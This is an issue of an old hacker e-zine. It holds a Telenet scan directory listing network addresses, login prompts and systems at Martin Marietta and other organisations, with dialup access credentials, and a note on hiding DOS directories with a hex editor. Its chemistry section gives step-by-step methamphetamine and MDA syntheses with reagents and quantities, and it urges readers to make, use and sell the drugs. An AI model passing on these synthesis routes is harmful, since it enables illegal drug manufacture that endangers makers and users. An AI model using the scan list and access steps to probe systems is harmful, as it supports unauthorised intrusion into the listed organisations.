Scanned By The Beaver l l____________________________________________l Information on Telenet: The First thing you need to do is obtain a dialup list. To do this, call 1-800-424-9494 <1200 7E1, or 1200 8N1 with hit bit striping on>. Once on, you will receive a "TERMINAL=", which at this point, enter your terminal type, or just press return . You will now get a "@" prompt. From here type "c mail". At the "Username?" prompt, enter "phones" and the same for the "Password?" prompt. At this point, simply follow the directions, and you will get your local dialup. One thing I would like to note, when using the 300/1200 dialups, when you connect, simply hit return a few times. When using the 2400 dialups, you must enter "@" followed by a carriage return. For more information on Telenet, I advise you to get Hacker's Unlimited issue#1 or LOD/H Technical Journal for more information on Telenet. I did not wish to make this a text file on Telenet, but rather a directory of listings scanned by myself and fellow S.A.O.O members. The "area" that is implied in this list basicly means that is the overall area that was covered. Just because a machine was found in a scan in a specific area does not always mean it IS in that area. At the bottom of the list for "interconnecting" hosts. Part I consisted of the New York and half the Washington D.C. area. In this issue is the rest of the D.C. along with 904, 305 and the 404. Please enjoy. Prefix: 904 Scanned: 0-999 Suffix Information O/S ------ -------------------------------------------------------------- ---- 163 - Refuse Collect Calls 231 - Refuse Collect Calls 236 - Refuse Collect Calls 237 - Refuse Collect Calls Prefix: 305 Scanned: 0-999 Suffix Information O/S ------ -------------------------------------------------------------- ---- 004 - Martin Marietta - SIM3278 022 - INH6.NET.FDP <404 60033> 034 - Martin Marietta Proprietary Network VM 035 - "ENTER SWITCH CHARACTERS" Unknown 059 - ".INVALID COMMAND", VTAM? 105 - Refuse Collect Calls 106 - Refuse Collect Calls 120 - Refuse Collect Calls 121 - Refuse Collect Calls 122 - Refuse Collect Calls 130 - Unknown 135 - Refuse Collect Calls 136 - INH6.NET.FDP <404 60033> 140 - ".INVALID COMMAND" , VTAM? 141 - "Select Desired System:" Server 142 - Telenet PAD 145 - Telenet PAD 149 - S901.net.buc 150 - Refuse Collect Calls 156 - Telenet PAD 162 - Unknown 170 - Refuse Collect Calls 171 - "ENTER SWITCH CHARACTERS" 172 - Unknown 175 - Telenet PAD 177 - Unknown 178 - s901.net.bus 237 - Comcast Information Service VM 241 - Unknown 245 - Refuse Collect Calls 247 - "SEND" Unknown 250 - "aci login:" Unix. 253 - "PACKET/74" SNA, must be IBM 254 - "PACKET/74" 339 - "PACKET/74" 342 - Refuse Collect Calls 347 - "PACKET/74" 362 - Clarion Software On-line Info. Service, type "new" for new user 363 - Clarion Software 364 - Clarion Software 365 - Clarion Software 366 - Clarion Software 370 - Refuse Collect Calls 371 - VAX/VMS in Another Laug! VAX/VMS 372 - Refuse Collect Calls 438 - Refuse Collect Calls 461 - Refuse Collect Calls 463 - Martin Marietta VM 464 - Refuse Collect Calls 465 - Unknown 467 - HP Unix 471 - Unknown 472 - Refuse Collect Calls 566 - Busy At Scan 567 - Busy At Scan 644 - ".INVALID COMMAND" 645 - ".INVALD COMMAND" Interconnection: [305136 - 404 60033] Prefix: 202 Scanned: 400-999 Suffix Information O/S ------ -------------------------------------------------------------- ---- 403 - Refuse Collect Calls 433 - Refuse Collect Calls 447 - Access Not Allowed From PAD 448 - Access Not Allowed From PAD 449 - Access Not Allowed From PAD 453 - Telenet PAD 454 - VAX/VMS GBS VAX/VMS 455 - Refuse Collect Calls 456 - Refuse Collect Calls 458 - Refuse Collect Calls 459 - Refuse Collect Calls 462 - Access Not Allowed From PAD 463 - Access Not Allowed From PAD 465 - Refuse Collect Calls 466 - Refuse Collect Calls 467 - Refuse Collect Calls 468 - Refuse Collect Calls 469 - Refuse Collect Calls 472 - Refuse Collect Calls 473 - Access Not Allowed From PAD 474 - Access Not Allowed From PAD 475 - Access Not Allowed From PAD 477 - "UPI>" Unknown 478 - "UPI>" Unknown 479 - "UPI>" Unknown 550 - "UPI>" Unknown 555 - Access Not Allowed From PAD 616 - Refuse Collect Calls 617 - Refuse Collect Calls 652 - Refuse Collect Calls 653 - Refuse Collect Calls 654 - Refuse Collect Calls 810 - Telenet Async to 3270 Prefix: 404 Scanned: 0-999 Suffix Information O/S ------ --------------------------------------------------------------- ---- 005 - Connects/disconnects with no disconnect msg 022 - Refuse Collect Calls 029 - Telenet PAD? 053 - VTAM Server 057 - Unknown 059 - Unknown 070 - Unknown 077 - Unknown 079 - Unknown 113 - Refuse Collect Calls 114 - Refuse Collect Calls 124 - Access Not Allowed From PAD 127 - Access Not Allowed From PAD 128 - Access Not Allowed From PAD 140 - Access Not Allowed From PAD 141 - Access Not Allowed From PAD 142 - Access Not Allowed From PAD 143 - Unknown 161 - Connect/disconnects 162 - Connect/disconnects 168 - Unknown 171 - "OK" Unknown 244 - Connect/disconnects 247 - Unknown 277 - Connect/disconnects 343 - Access Not Allowed From PAD 344 - Access Not Allowed From PAD 349 - Primenet 351 - Unknown VAX/VMS 352 - Unknown VAX/VMS 358 - "Please login to network U:" 359 - "Please login to network U" 362 - Access Not Allowed From PAD 372 - System/88 373 - System/88 374 - Refuse Collect Calls 375 - "Please login to network U:" 532 - Refuse Collect Calls 556 - Refuse Collect Calls 557 - Refuse Collect Calls 558 - Refuse Collect Calls 559 - Refuse Collect Calls 560 - Unknown VAX/VMS 633 - Unknown VAX/VMS 635 - Unknown VAX/VMS 60033 - INH6.NET.FDP --------------------------------------------- Hidding Directories By Dementia Meister ---------------------------------- Here is how to really hide directorys. First off, you need a HEX-Editor, like DISKEDIT.EXE from Norton Utilities v6.01(the one I recommend). Then you need a directory that you want to hide. Warning: Play/test this method out on a floppy first so you do not screw up your HD. I have lost many of data (my fault, by lack of knowledge). This method is relatively safe as long as you do not calibrate, speedisk, etc.. your HD. Well back to the task at hand, go into the HEX-Editor and find your DIR. Now this is the tricky part. Go to the DIR name and change it to an ext. only, plus add the HIDDEN attribute to it. Now almost nothing can find your DIR, not NCD, not DOS, not anything BUT a HEX-Editor that you manually go and find. To UNHIDE the DIR, you go into the HEX-Editor find the DIR change it to a legitamate name and wall-la you have it. ThanX from the EDITOR of this INFO. -=[ ]). |\|\. ]=- (Dementia Meister) Welcome to Down and Dirty Chemistry 101 This file is for those who wish to make drugs in thier own home, to sell or just to take. Unlike most how to files on dope manufacture, this one is for people who are more worried about getting dope made than getting it 100% pure and of pharmacutical quality. These methods are the quickest and most simple around. You don't need a PhD. to make these compounds, but a little knowledge of chemistry is a must. * DISCLAIMER * This where most people leave a message about how the file is for informa- tional use only. BULLSHIT, if you are old enough to make these drugs then you are old enough to decide for yourself if you want to take them or not. I say go right ahead, make 'em then take 'em. Yea it's illegal, so BE CAREFUL, but if you aren't going to use this file then why keep it? pass it on to someone who will, and scam some of thier first batch as an info retrieval fee. TYRAMINE Tyramine is a fairly potent stimulant that is found naturally in cheese. Don't even think about extracting it. It is easily made from the amino acid tyrosine by decarboxilating it. Tyrosine is rather carefully watched by the DEA, so don't buy it from a chem. supply comany, no matter how much cheaper it is there. It is available as the free form amino acid from most any health food store. To decarboxilate the tyrosine at home, simply heat it with barium hydroxide and seperate tyramine from the solution. Tyramine and tyrosine are both only slighty soluble in water, so filtering with hot water should remove most of the impurities and leave you with tyramine and unreacted tyrosine. The entire synthesis could take place in a coffee pot. * MUSCIMOLE * This is another drug with a synthesis so easy, it is funny. It is the active compound in many old world mushrooms, and may well be the first drug that early man tripped on. I have never tried it, but I heard that it can cause a few unpleasent effects (muscle twitching, dizziness). It is still legal in some states and ibotenic acid is fairly sfe to order from a supply company. To make muscimole, reflux ibotenic acid in 10 times it's weight of water. * METHAMPHETAMINE * Crank, crystal meth, wire: all words known and loved by speed freaks around the world. This is the mother of all amphetamines, a small line will wire you for 12 hours. There are many ways to go about making crank, if you have access to an organic chemistry lab. For those who don't, this may be the simplest approach. This method uses ephedrine as the main precurser because it is very similar in structure to crank. Look them both up and see. All you need to do is replace an OH group with a hydrogen atom............. No Problem. Ephedrine is available from suppliers in the back of magazines (Penthouse, Cosmopoliton) for about $20 for 1,000 25mg tablets, just extract the pure ephedrine out. Put a 2 liter flask into an ice bath with a stirrer in one neck and at least one neck to pour chemicals into. Add 360 ml chloroform, then 360 g of phosphorus pentachloride and stir for 1/2 hour. Then add 240 g of ephedrine hydrochloride over 45 minutes, put in 60 ml more chloroform, and stir for 2 hours. Let the brew stand in ice for 45 min. and decant the juice off, DON'T let the left over PCl5 come over, filter if any does. Add mineral spirits until the total volume is 4 liters, then let the chlorephedrine crystalize in the freezer for an hour. Filter and dry your crystals. To make methamphetamine from chlorephadrine you must replace the Cl atom with a hydrogen. There are many catalysts that will work, zinc is cheap and easy to get, but gives a rather low yield of speed. Palladium is probably the best way to go. Take a champagne bottle, 2L is a good size, and wrap it in duct tape to be safe. Add 50g anhydrous sodium acetate and 700ml of distilled water. Make a buffer solution by adding acetic acid until the pH is 7. Add 2g of palladium , either on charcoal or barium sulfate, then 125g of chlorephadrine. Attach a cylender of H gas and increase to 30lbs pressure. Keep this pressure up for several hours, until H stops being absorbed. Stir with magnetic stirer or if need be just shake it regularly over the whole time. Decant off the liquid and filter to remove the catalyst. make the solution strongly basic (pH 10-11) with NaOH and shake like hell for about 5 min. Extract with Benzene and discard the water layer. Fractional distillation is required to seperate the chorephadrine from the meth, the meth comes over first followed immediatly by chlorephadrine. Palladium black on charcoal is on the DEA watched chemical list, be careful obtaining it. The Merk index should have a formula for making it. If you go with the zinc use about twice as many moles as you would with palladium. *MDA* Ahh, the origional love drug! This is essentially the same as XTC, but as it is easier to make and stronger I will give this formula instead. Safrole is the main precurser and can be obtained in sasafrass oil which is available at any store that sells herbs, it is about 80% safrole by volume and pure safrole can be distilled from the oil under a vacuum. When the distillate appears to be a homogenious oil, collect it in a clean flask, this is safrole. In a glass vessel, in an ice bath, slowly add 450g concentrated sulfuric acid to 400g acetonitrile. Keep the temperature under 10 degrees C while making the addition. Take the mixture out of the ice bath and add 236g safrole Stir occasionally and watch the temperature. When the solution reaches 80 deg. C put the flask back in the ice bath and then pour into a gallon of ice water with 18 oz NaOH in it. Stir while pouring. Decante the yellow oily layer on top into another flask. Add 10 times the volume of 10% KOH in 190 proof vodka. Reflux for 6 hours. Boil away most of the alcohol under a vacuum. Add water to dissolve the KOH and extract your dope with benzene. Distill under a vacuum and collect the fraction coming over at about 125 deg. C (at about 20 torr). Crystallize in your freezer, and filter. Dry the crystals. One "hit" is about 100mg. This is all the space and time I have to write. Expect D$DChem II in the next issue of Critical Mass. If you have any questions or comments you can reach me on any SAOO support bbs. Address mail to Art Phish. I would be happy to include any synthesis that is requested in the next issue. Art Phish _________________________________________ Closing Notes __________________________ Welp, that concludes yet another fine issue of Critical Mass. In issue number 8, perpare yourself for the following...... SAOO Telenet Directory Part III Hacking The Department Of Motor Vec. More Chemistry, from Art Phish Probably a article on Telenet considering the resent questions I have received. An much, much more! If you would like to be involved in computer conference, please leave The Beaver Email at one of the location given at the beging of this issue of Critical Mass. Until the next issue, chow... And Happy, Safe! hack'in. If you have any article pretaining to not so often talked about subjects, please E-mail the Beaver. Also, after the writing of "How to take DEC Servers Off the air", there seemed to be the misconception on why the article was produced. It seems that some people believed that the article was put out because I am "a bad person whom only likes destroying data". This is a pretty far fetched thing to say. Shortly after the articles release, I heard that a friend of mine at DOR read that part and then secured there server more. That, my friend, was the purpose of the article. To get information out there, among the people. Till the next CM, I guess I will be seeing ya on the nets.... Chow! ---====--- Member S.A.O.O.